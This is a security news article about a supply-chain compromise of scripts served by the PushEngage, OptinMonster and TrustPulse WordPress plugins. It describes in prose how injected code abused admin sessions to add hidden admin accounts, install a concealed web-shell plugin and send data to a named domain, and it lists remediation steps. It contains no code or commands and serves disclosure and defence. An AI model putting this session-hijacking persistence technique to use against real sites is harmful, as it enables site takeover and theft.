Massive WordPress Supply-Chain Attack Found as Popular Plugins Secretly Install Hidden Backdoors on Sites

A major supply-chain security incident has been uncovered involving widely used WordPress plugins, where attackers tampered with legitimate JavaScript files to secretly compromise websites.

Security researchers at Sansec discovered that trusted scripts used by PushEngage, OptinMonster, and TrustPulse were modified and turned into a hidden backdoor mechanism capable of taking over websites running these plugins.

The malicious activity was designed to activate only under specific conditions. When a website administrator was logged into WordPress and loaded the compromised script, the injected code would silently execute actions using the admin’s active session. This allowed attackers to create a new administrator account under their control and install a hidden plugin that enabled persistent remote access.

Regular site visitors were not affected, making the attack difficult to detect through normal browsing or dashboard checks.

Widespread Exposure Through Trusted Plugins

All three affected plugins are developed under the same company, Awesome Motive. Sansec reported that the malicious code was present across all three services’ JavaScript files, indicating a coordinated supply-chain compromise.

PushEngage later confirmed that its scripts had been tampered with and warned that any site loading the affected files could be fully compromised. However, OptinMonster and TrustPulse had not issued detailed public guidance at the time of reporting.

The exposure windows varied. OptinMonster and TrustPulse were reportedly affected for only about 25 minutes on June 12 before the malicious code was removed. PushEngage, however, experienced a longer exposure lasting several hours, with some infected scripts still being served from CDN servers until June 14.

Collectively, the plugins are estimated to impact more than 1.2 million websites, though the actual number of compromised sites is expected to be lower.

How the Attack Worked

The injected JavaScript was designed to remain inactive during normal website visits. It only executed when a logged-in WordPress administrator accessed the site.

Once triggered, it leveraged the administrator’s session to perform high-privilege actions, including:

• Creating a hidden admin account controlled by attackers
• Installing a concealed plugin that does not appear in the WordPress dashboard
• Exfiltrating site data and credentials to a malicious domain (tidio.cc)

The hidden plugin effectively acted as a web shell, allowing attackers to remotely execute commands on the compromised server without authentication. This gave them the ability to modify files, access databases, inject malicious scripts, or maintain persistent control.

To ensure continued access, attackers also created additional admin accounts as backup entry points.

Possible Entry Point and Dispute

The exact method of initial compromise remains unclear. PushEngage claims the attackers may have exploited a vulnerability in the UpdraftPlus WordPress backup plugin on its marketing infrastructure, allowing them to steal a CDN API key.

With that key, attackers would not need to breach core systems directly. Instead, they could alter files distributed through the CDN to thousands of customer websites.

However, security researchers note that the true entry point has not been confirmed. Possibilities include compromised internal servers or CDN credentials, while no final conclusion has been reached. UpdraftPlus does contain a known high-severity vulnerability (now patched), but its role in this attack remains unverified.

Impact and Response

PushEngage stated that its core systems and customer databases were not directly breached. The issue was isolated to CDN-served scripts. The company has since rotated credentials, replaced malicious files, and cleared cached content.

Despite this, experts warn that any site affected during the attack window should still be treated as compromised. Removing the plugin or admin account alone may not eliminate all backdoors.

What Website Owners Should Do

Security researchers recommend immediate action for any WordPress site that used PushEngage, OptinMonster, or TrustPulse during the incident window:

• Perform a full server-side security scan (not just dashboard checks)
• Inspect wp-content/plugins for suspicious folders or hidden components
• Review admin accounts for unauthorized additions
• Check server logs for outbound connections to suspicious domains such as tidio.cc
• Rotate all credentials, including admin passwords, database access, API keys, and WordPress security salts

Because the malware is designed to hide from the WordPress dashboard, only deep server-level inspection can reliably determine whether a site has been compromised.